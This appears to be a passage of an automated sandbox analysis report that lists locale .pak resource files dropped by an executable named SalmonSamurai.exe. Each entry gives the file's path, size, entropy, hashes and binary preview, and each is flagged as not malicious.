                                                                                                                                                                                                                                          SHA-256:265D8B1BC479AD64FA7A41424C446139205AF8029A2469D558813EDD10727F9C
                                                                                                                                                                                                                                          SHA-512:547A1581DDA28C5C1A0231C736070D8A7B53A085A0CE643A4A1510C63A2D4670FF2632E9823CD25AE2C7CDC87FA65883E0A193853890D4415B38056CB730AB54
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........S...h.....i.....j.%...k.4...l.?...n.G...o.L...p.Y...r._...s.p...t.y...v.....w.....y.....z.....|.....}.........................................................................1.....D.....S.....l.....w.................................................................?.....F.....V.....d.....p.....}...............................................!.....7.....k.............................................................................O.....t.......................................................................>.....L.....Y.....v...........................................................3.....H.....[.....s.................................................................*.....u.............................,.....R.....Z.....n.....w...............................................3.....N............................................. .....".....%.....(.(...*.D...+.G...,.e.....v.../.....0.....1.....3.....4.....5.....6.}...7.....8.....9.....;.....<.....=.....>.....?.....@./...A.]...C.....D...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\ja.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):505292
                                                                                                                                                                                                                                          Entropy (8bit):5.701779406023226
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:rO2YZ2QUgbjicTver049pUVOT6z4Z72hA/Na4oQPkwaIAOenOIUNH7bbeCcX5RWX:rOpZ2eH/IzSVKo4Z728owPS58HRxVX
                                                                                                                                                                                                                                          MD5:D10D536BCD183030BA07FF5C61BF5E3A
                                                                                                                                                                                                                                          SHA1:44DD78DBA9F098AC61222EB9647D111AD1608960
                                                                                                                                                                                                                                          SHA-256:2A3D3ABC9F80BAD52BD6DA5769901E7B9E9F052B6A58A7CC95CE16C86A3AA85A
                                                                                                                                                                                                                                          SHA-512:C67AEDE9DED1100093253E350D6137AB8B2A852BD84B6C82BA1853F792E053CECD0EA0519319498AED5759BEDC66D75516A4F2F7A07696A0CEF24D5F34EF9DD2
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..........y.h.....i.....j.....k.....l.....m.....o.....p.....v.....w.....y.....z.....|.....}.0.....8.....=.....E.....P.....X.....g.....l.....t.....{...............................................$.....*.....<.....d.....y...................................).....S.....t...............................................'.....H.....c.....i.....x.............................5.....;.....M.....k...............................................E.....u.....................................................+.....R.....^.............................Q.....~...............................................#.....8.....d...........................................................V...........,.....2...................................5.....>.....J.....P.....Y.....t.............................8............................................. .....".....%.I...(.....*.....+.....,.........../.....0.#...1.h...3.....4.....5.....6.....7.4...8.R...9.p...;.....<.....=.....>.....?.....@.....A.E...C.l...D.....E.....F.....G...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\kn.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1012272
                                                                                                                                                                                                                                          Entropy (8bit):4.2289205973296395
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:VxaK34cS7yFcH4dr/4g7M5iVUZ+xw+UFV:jf7/K5uUb
                                                                                                                                                                                                                                          MD5:C548A5F1FB5753408E44F3F011588594
                                                                                                                                                                                                                                          SHA1:E064AB403972036DAD1B35ABE9794E95DBE4CC00
                                                                                                                                                                                                                                          SHA-256:890F50A57B862F482D367713201E1E559AC778FC3A36322D1DFBBEF2535DD9CB
                                                                                                                                                                                                                                          SHA-512:6975E4BB1A90E0906CF6266F79DA6CC4AE32F72A6141943BCFCF9B33F791E9751A9AAFDE9CA537F33F6BA8E4D697125FBC2EC4FFD3BC35851F406567DAE7E631
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........m...h.<...i.M...j.Y...k.h...l.s...n.{...o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................!.....(...../.....6.....7.....8.....=.................=.....}......................./.....A.............................:.......................&.....d.................-.....U.................6.....N.....j.................L.............................4.....C.....F.....d.................4.................e.........................................P.....o...............................................J...........,.....H.....v.................(.....+.....e.......................G.....................................................(...........V...................................H.....`.....................................................c.................e.......................0.....k......... .....".....%._...(.....*.....+.....,.......4.../.l...0.....1.....3.7...4.....5.....6.U...7.....8.....9.....;.O...<.l...=.....>.....?.....@.....A.....C.....D...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\ko.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):425545
                                                                                                                                                                                                                                          Entropy (8bit):6.081959799252044
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:4Y3l9B6CI1zt8OhrJRFJCqM5T718I8Mtmq7hUoBAA:aZJo5D8GAA
                                                                                                                                                                                                                                          MD5:B4FBFF56E4974A7283D564C6FC0365BE
                                                                                                                                                                                                                                          SHA1:DE68BD097DEF66D63D5FF04046F3357B7B0E23AC
                                                                                                                                                                                                                                          SHA-256:8C9ACDE13EDCD40D5B6EB38AD179CC27AA3677252A9CD47990EBA38AD42833E5
                                                                                                                                                                                                                                          SHA-512:0698AA058561BB5A8FE565BB0BEC21548E246DBB9D38F6010E9B0AD9DE0F59BCE9E98841033AD3122A163DD321EE4B11ED191277CDCB8E0B455D725593A88AA5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:............h.z...i.....j.....k.....l.....m.....o.....p.....r.....s.....t.....y.....z.....|.....}.......$.....).....1.....<.....D.....S.....X....._.....f.....h.....m...........................................................e.....u.....w.....{...............................................'.....F.....S.....f.....z...............................................$.....*.....3.....F.....Y....._.....b.....h.........................................8.....O.....U.....].....d.....m.....z................................... .....-.....W.....t.........................................,...../.....<.....L.....Y.....r.....................................................".......................s.................................................................=.....T...................................!.....'.....=.....O.....\... ._...".i...%.....(.....*.....+.....,.+.....A.../.^...0.j...1.....3.....4.....5.....6.=...7.S...8.j...9.z...;.....<.....=.....>.....?.....@.....A.....C.6...D.F...E.g...F.~...G...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\lt.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):457220
                                                                                                                                                                                                                                          Entropy (8bit):5.634955727013476
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:Ca5OlSk7unX4nkokvgneIVUoCb1DD7U5R3zv9dFaL8tx9e2lJ2I96S2:Ca5Olrpgme2UoC9c59zv9fx9eoP6S2
                                                                                                                                                                                                                                          MD5:980C27FD74CC3560B296FE8E7C77D51F
                                                                                                                                                                                                                                          SHA1:F581EFA1B15261F654588E53E709A2692D8BB8A3
                                                                                                                                                                                                                                          SHA-256:41E0F3619CDA3B00ABBBF07B9CD64EC7E4785ED4C8A784C928E582C3B6B8B7DB
                                                                                                                                                                                                                                          SHA-512:51196F6F633667E849EF20532D57EC81C5F63BAB46555CEA8FAB2963A078ACDFA84843EDED85C3B30F49EF3CEB8BE9E4EF8237E214EF9ECFF6373A84D395B407
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........U...h.....i.....j.)...k.8...l.C...n.K...o.P...p.]...r.c...s.t...t.}...v.....w.....y.....z.....|.....}.........................................................................8.....F.....S.....g.....r.....................................................5.....T.....m.....v...............................................!.....6.....=.....F.....S.....a.....u.....................................................&.....<.....Z.....w.............................5.....>.....F.....M.....X.....j.....................................................-.....T.....m.....{.................................................................H.....O.....R.....S.....].....h.....o.....y.................).....x.............................G.....X.....v...............................................B.....d...............................................)... .>...".N...%.m...(.....*.....+.....,.........../.!...0.$...1.U...3.f...4.....5.....6.....7. ...8.@...9.T...;.b...<.s...=.....>.....?.....@.....A.....C.:.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\lv.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):455871
                                                                                                                                                                                                                                          Entropy (8bit):5.635474464056208
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:GOQDGtu4e+D8NHtVFHTPq7K4vHo4q3sb3755ZanXDEG9Aarl4zxmEA5QXls14:GOQUZ2Gu4vTqw75KEGGmEs14
                                                                                                                                                                                                                                          MD5:E4F7D9E385CB525E762ECE1AA243E818
                                                                                                                                                                                                                                          SHA1:689D784379BAC189742B74CD8700C687FEEEDED1
                                                                                                                                                                                                                                          SHA-256:523D141E59095DA71A41C14AEC8FE9EE667AE4B868E0477A46DD18A80B2007EF
                                                                                                                                                                                                                                          SHA-512:E4796134048CD12056D746F6B8F76D9EA743C61FEE5993167F607959F11FD3B496429C3E61ED5464551FD1931DE4878AB06F23A3788EE34BB56F53DB25BCB6DF
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........e...h.,...i.=...j.I...k.X...l.c...n.k...o.p...p.}...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................&.....'.....(.....*.....O.....b.....u.....................................................!.....%.....M.....].....s.....z...............................................!.....2.....8.....>.....Q.....e.....{...........................................................%.....7.....I.....g.....}...........................................................3.....7.....P.........................................+.....<.....O.....d.....v...........................................................".....#.....-.....8.....@.....G.....Y.................-.....8...................................%.....,.....;.....>.....I....._.............................#.....T.....i.....p.....y..................... .....".....%.....(.....*.....+.1...,.O.....r.../.....0.....1.....3.....4.....5.!...6.\...7.|...8.....9.....<.....=.....>.....?.....@.....A.9...C.X...D.e.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\ml.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1056673
                                                                                                                                                                                                                                          Entropy (8bit):4.264965642462621
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:AYtrLnsoR47/R7nUwmoMmWDcZubSA/d+8di3ethK5d/7dxOt3ab:lt0oNwMi3eG5d/7Ot3c
                                                                                                                                                                                                                                          MD5:8B38C65FC30210C7AF9B6FA0424266F4
                                                                                                                                                                                                                                          SHA1:116413710FFCF94FBFA38CB97A47731E43A306F5
                                                                                                                                                                                                                                          SHA-256:E8DF9A74417C5839C531D7CCAB63884A80AFB731CC62CBBB3FD141779086AC7D
                                                                                                                                                                                                                                          SHA-512:0FD349C644AC1A2E7ED0247E40900D3A9957F5BEF1351B872710D02687C934A8E63D3A7585E91F7DF78054AEFF8F7ABD8C93A94FCD20C799779A64278BAB2097
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........j...h.6...i.G...j.S...k.b...l.m...n.u...o.z...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................".....).....0.....1.....2.....7.................".....b.....}.......................N...........3.....5.....9.....a.......................M.....{.................@.....n...........!.....e.............................'.......................C.....}.............................H.................=.................P.....~.........................................v.................I.....j.........................................b...................................q.......................b.....i.....l.....n.............................1...........q.....'.....E...........N...........(.....`...................................;.............................Y.....4.............................;.....k... .....".....%.n...(.....*.....+.....,.M........./.....0.....1.}...3.....4.....5.>...6.....7.....8.....9.....;.....<.8...=.X...>.....?.....@.....A.....C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\mr.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):863911
                                                                                                                                                                                                                                          Entropy (8bit):4.295071040310227
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:OVDue+/Ti/eFcDX6WRAWXXspvidz0F5MU9G3GRe3RQR3K5/knxi4nou4bmHwIZus:eueAi2FZW2bo26lp70Kte5zGpGiBs
                                                                                                                                                                                                                                          MD5:C0EF1866167D926FB351E9F9BF13F067
                                                                                                                                                                                                                                          SHA1:6092D04EF3CE62BE44C29DA5D0D3A04985E2BC04
                                                                                                                                                                                                                                          SHA-256:88DF231CF2E506DB3453F90A797194662A5F85E23BBAC2ED3169D91A145D2091
                                                                                                                                                                                                                                          SHA-512:9E2B90F3AC1AE5744C22C2442FBCD86A8496AFC2C58F6CA060D6DBB08AF6F7411EF910A7C8CA5AEDEE99B5443D4DFF709C7935E8322CB32F8B071EE59CAEE733
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........(...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.#...t.,...v.A...w.N...y.T...z.c...|.i...}.{.......................................................................9.....[.....}...................................!...................................).....\.............................?.......................&.....E.....a.....w.......................[...............................................4.....^.......................L...................................&.....2.....U.....n.......................i.....................................................;.....X.........................................:.....m.....t.....w.....y.........................................7...................................-.....F.....f.....o.............................".....v.................O.............................?.....t......... .....".....%.,...(.b...*.....+.....,.........../.?...0.L...1.....3.....4.....5.P...6.....7.....8.:...9.b...;.....<.....=.....>.....?.....@.I...A.}...C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\ms.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):390303
                                                                                                                                                                                                                                          Entropy (8bit):5.258177538585681
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:zCsFFfyrvxoQuXkulRopY/5BI8T5sHAVHMM/k3y:tQxoNlR6K5v5vVsMZ
                                                                                                                                                                                                                                          MD5:9B3E2F3C49897228D51A324AB625EB45
                                                                                                                                                                                                                                          SHA1:8F3DAEC46E9A99C3B33E3D0E56C03402CCC52B9D
                                                                                                                                                                                                                                          SHA-256:61A3DAAE72558662851B49175C402E9FE6FD1B279E7B9028E49506D9444855C5
                                                                                                                                                                                                                                          SHA-512:409681829A861CD4E53069D54C80315E0C8B97E5DB4CD74985D06238BE434A0F0C387392E3F80916164898AF247D17E8747C6538F08C0EF1C5E92A7D1B14F539
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........c...h.(...i.0...j.<...k.K...l.V...n.^...o.c...p.p...r.v...s.....t.....v.....w.....y.....z.....|.....}................................................................... .....J.....].....q.................................................................<.....R.....r.....{.......................................................................+.....;.....J.....y.............................................................................6.....S.....w.............................................................................:.....S....._.................................................................0.....I.....`.....s.....z.....}.....~.....................................................M.....T.................................................................2.....N.....f.....................................................,.....:... .=...".I...%.u...(.....*.....+.....,.........../.....0.....1.....3.;...4.Z...5.m...6.....7.....8.....9.....;.....<.....=.....>.:...?.B...@.W...A...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\nb.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):383011
                                                                                                                                                                                                                                          Entropy (8bit):5.424530593988954
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:rmRAsByIhGvbSqOp7f21zg2mKP7s4Uzwn5el4nYHOp1D:rmRGxvbSqOp7f21vs4kM5el4Jp1D
                                                                                                                                                                                                                                          MD5:AF0FD9179417BA1D7FCCA3CC5BEE1532
                                                                                                                                                                                                                                          SHA1:F746077BBF6A73C6DE272D5855D4F1CA5C3AF086
                                                                                                                                                                                                                                          SHA-256:E900F6D0DD9D5A05B5297618F1FE1600C189313DA931A9CB390EE42383EB070F
                                                                                                                                                                                                                                          SHA-512:C94791D6B84200B302073B09357ABD2A1D7576B068BAE01DCCDA7BC154A6487145C83C9133848CCF4CB9E6DC6C5A9D4BE9D818E5A0C8F440A4E04AE8EABD4A29
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........S...h.....i.....j.+...k.:...l.E...n.M...o.R...p._...r.e...s.v...t.....v.....w.....y.....z.....|.....}.........................................................................3.....>.....M.....`.....h.....r.....................................................$.....<.....A.....P.....a.....h.....t...........................................................).....\.....o.....v.....{...........................................................).....A.....Z.....e.....i.....q.....x.....~...........................................................5.....X.....n.....w.........................................................................................!.....).....4.....;.....F.....v.......................>.....X.....p...........................................................&.....?.....W................................................... .....".....%. ...(.@...*.c...+.f...,.........../.....0.....1.....3.....4.....5.....6.L...7.c...8.....9.....;.....<.....=.....>.....?.....@.....A.....C.".

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\nl.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):395064
                                                                                                                                                                                                                                          Entropy (8bit):5.365550895872654
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:9V01rV7gSsX5SEHDpaQe3D+qnRVd5qYx1Gp7KhaPW:96NFgSsX5S1V7d5qYx1Gp7KcPW
                                                                                                                                                                                                                                          MD5:181D2A0ECE4B67281D9D2323E9B9824D
                                                                                                                                                                                                                                          SHA1:E8BDC53757E96C12F3CD256C7812532DD524A0EA
                                                                                                                                                                                                                                          SHA-256:6629E68C457806621ED23AA53B3675336C3E643F911F8485118A412EF9ED14CE
                                                                                                                                                                                                                                          SHA-512:10D8CC9411CA475C9B659A2CC88D365E811217D957C82D9C144D94843BC7C7A254EE2451A6F485E92385A660FA01577CFFA0D64B6E9E658A87BEF8FCCBBEAF7E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........E...h.....i.....j.....k.....l.#...n.+...o.0...p.=...r.C...s.T...t.]...v.r...w.....y.....z.....|.....}...............................................................................$.....4.....E.....N.....W.....r.....z.....................................................'.....7.....I.....V.....c...........................................................!.....`.....u.....z...........................................................+.....G.....f.......................................................................9.....E.....].....v.....................................................2.....F.....Y.....t.................................................................'.....a...................................<.....I.....Y.....a.....j.....n.....r...................................".....O.....d.....m.....x..................... .....".....%.....(.....*.....+.....,.!.....2.../.I...0.S...1.....3.....4.....5.....6.....7.....8.;...9.J...;.Z...<.h...=.v...>.....?.....@.....A.....C.....D...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\pl.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):439920
                                                                                                                                                                                                                                          Entropy (8bit):5.766175831058526
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:f2jujSo9/D+Xgv3iWGb1vPiCUdhUo3Ymhz1QhjAB5cUE447e:Sc3N1Qhw5me
                                                                                                                                                                                                                                          MD5:18D49D5376237BB8A25413B55751A833
                                                                                                                                                                                                                                          SHA1:0B47A7381DE61742AC2184850822C5FA2AFA559E
                                                                                                                                                                                                                                          SHA-256:1729AA5C8A7E24A0DB98FEBCC91DF8B7B5C16F9B6BB13A2B0795038F2A14B981
                                                                                                                                                                                                                                          SHA-512:45344A533CC35C8CE05CF29B11DA6C0F97D8854DAE46CF45EF7D090558EF95C3BD5FDC284D9A7809F0B2BF30985002BE2AA6A4749C0D9AE9BDFF4AD13DE4E570
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........T...h.....i.....j.%...k.4...l.?...n.G...o.L...p.Y...r._...s.p...t.y...v.....w.....y.....z.....|.....}.........................................................................6.....E.....S.....h.....q...........................................................3.....M.....S.....g.....|.................................................................).....;.....n.............................................................................2.....N.....i.....{.................................................................+.....6.....V.....c...........................................................(.....7.....M.....d.....{...........................................................T.............................,.....i.....r.....................................................7.....V.....r............................................. .....".)...%.K...(.c...*.....+.....,.........../.....0.....1.....3.,...4.K...5.i...6.....7.....8.....9.....;.....<.....=.....>.....?.$...@.7...A.{...C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\pt-BR.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):415447
                                                                                                                                                                                                                                          Entropy (8bit):5.426006792591415
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:Bm1HqF4Znh9GzBtNBXBLd1OUDcpryHF55NJND0bsRzlb2:UHrnhMzX5PJB4sRxC
                                                                                                                                                                                                                                          MD5:0D9DEA9E24645C2A3F58E4511C564A36
                                                                                                                                                                                                                                          SHA1:DCD2620A1935C667737EEA46CA7BB2BDCB31F3A6
                                                                                                                                                                                                                                          SHA-256:CA7B880391FCD319E976FCC9B5780EA71DE655492C4A52448C51AB2170EEEF3B
                                                                                                                                                                                                                                          SHA-512:8FCF871F8BE7727E2368DF74C05CA927C5F0BC3484C4934F83C0ABC98ECAF774AD7ABA56E1BF17C92B1076C0B8EB9C076CC949CD5427EFCADE9DDF14F6B56BC5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........j...h.6...i.G...j.S...k.b...l.m...n.u...o.z...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................".....).....0.....1.....2.....7....._.....q.....................................................#.....%.....).....T.....c.....|...................................................../.....F.....P.....X.....h.....y...........................................................%.....:.....H.....Y.....r.................................................................+.....5.....F.....~...............................................).....;.....S.....V.....g.....y.............................................................................=.....y............................. .....H.....R.....i.....p.....z...............................................3.....f....................................... .....".....%.....(.....*.(...+.+...,.I.....Z.../.n...0.w...1.....3.....4.....5.....6.-...7.A...8.Y...9.l...;.|...<.....=.....>.....?.....@.....A.....C.!...D.+.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\pt-PT.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):416977
                                                                                                                                                                                                                                          Entropy (8bit):5.401132911995885
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:isWkrPyGJeOMqieJVJJxhlOlxLu3ov5xKqSR0B:X3PBxj8zv5xKqSRW
                                                                                                                                                                                                                                          MD5:6A7232F316358D8376A1667426782796
                                                                                                                                                                                                                                          SHA1:8B70FE0F3AB2D73428F19ECD376C5DEBA4A0BB6C
                                                                                                                                                                                                                                          SHA-256:6A526CD5268B80DF24104A7F40F55E4F1068185FEBBBB5876BA2CB7F78410F84
                                                                                                                                                                                                                                          SHA-512:40D24B3D01E20AE150083B00BB6E10BCA81737C48219BCE22FA88FAAAD85BDC8C56AC9B1EB01854173B0ED792E34BDFBAC26D3605B6A35C14CF2824C000D0DA1
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........s...h.H...i.Y...j.e...k.t...l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................%.....-.....4.....;.....B.....C.....D.....I.....r...........................................................&.....(.....,.....W.....f...........................................................!.....9.....C.....K.....\.....n.................................................................%.....3.....D.....b.................................................................#.....+.....<.....t.....~...............................................(.....:.....T.....W.....h.....|.............................................................................N...................................0.....X.....b.....|.....................................................;.....^............................................. .....".....%.....(.3...*.P...+.S...,.q........./.....0.....1.....3.....4.....5.8...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.+...A.a...C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\ro.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):430191
                                                                                                                                                                                                                                          Entropy (8bit):5.460617985170646
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:pqgw32K4aoFt3GgnSYn0vLi5OU6ois2a/7ulqr:pqgVzFt3GgnSY0vLi5OXo3/5r
                                                                                                                                                                                                                                          MD5:99EAA3D101354088379771FD85159DE1
                                                                                                                                                                                                                                          SHA1:A32DB810115D6DCF83A887E71D5B061B5EEFE41F
                                                                                                                                                                                                                                          SHA-256:33F4C20F7910BC3E636BC3BEC78F4807685153242DD4BC77648049772CF47423
                                                                                                                                                                                                                                          SHA-512:C6F87DA1B5C156AA206DC21A9DA3132CBFB0E12E10DA7DC3B60363089DE9E0124BBAD00A233E61325348223FC5953D4F23E46FE47EC8E7CA07702AC73F3FD2E9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........L...h.....i.....j.....k.$...l./...n.7...o.<...p.I...r.O...s.`...t.i...v.~...w.....y.....z.....|.....}.........................................................................1.....@.....L.....Z.....e.....p...........................................................<.....E.....^.....n.....y...............................................+.....?.....T.................................................................M.....n...................................#.....+.....2.....8.....G.....Y.....n.....u...............................................T.....b.....t.....................................................,.....@.....G.....J.....K.....W.....c.....p.....y.................).....r.....z.............................9.....S.....d.....l.....r.....x.............................3.....V............................................. .....".....%.<...(.S...*.k...+.n...,.........../.....0.....1.....3.....4.'...5.G...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.&...A._...C.....D...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\ru.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):703696
                                                                                                                                                                                                                                          Entropy (8bit):4.836890612319527
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:ckXRY5eXN2hHO3j/jHXzvMBsiA2kkce8P/XyFGGJGswfaZ/LeUFCcYWIkHWajf+F:ck5LZ5w6pF
                                                                                                                                                                                                                                          MD5:AB9902025DCF7D5408BF6377B046272B
                                                                                                                                                                                                                                          SHA1:C9496E5AF3E2A43377290A4883C0555E27B1F10F
                                                                                                                                                                                                                                          SHA-256:983B15DCC31D0E9A3DA78CD6021E5ADD2A3C2247322ADED9454A5D148D127AAE
                                                                                                                                                                                                                                          SHA-512:D255D5F5B6B09AF2CDEC7B9C171EEBB1DE1094CC5B4DDF43A3D4310F8F5F223AC48B8DA97A07764D1B44F1D4A14FE3A0C92A0CE6FE9A4AE9A6B4A342E038F842
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..........S.h.....i.....j.....k.....l.....n.#...o.(...p.5...r.;...s.L...t.U...v.j...w.w...y.}...z.....|.....}.........................................................................:.....W.....t.........................................E.....l.....n.....r...................................(.....A.....K.............................3.....?.....b.......................+.....5.....F.....[.....v.........................................8.....f.........................................*.....K.....e...................................H.....i.............................7.....t.....w...................................B.....I.....L.....M.....].....q...................................>.....J.................#.....e.........................................6.....t.................:.......................#.....7.....G.....w......... .....".....%.....(.....*.....+.....,.........../.....0.....1.]...3.t...4.....5.....6.N...7.r...8.....9.....;.....<.....=.....>.8...?.G...@.f...A.....C.!...D.2...E.j...F...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\sk.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):443094
                                                                                                                                                                                                                                          Entropy (8bit):5.818852266406701
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:vQt/WMWyqiLJcPXPk5ELALWaQlKDEmLFGR:vQYfyqiWPXM5ELALWaQlwdLE
                                                                                                                                                                                                                                          MD5:C6C7396DBFB989F034D50BD053503366
                                                                                                                                                                                                                                          SHA1:089F176B88235CCE5BCA7ABFCC78254E93296D61
                                                                                                                                                                                                                                          SHA-256:439F7D6C23217C965179898754EDCEF8FD1248BDD9B436703BF1FF710701117A
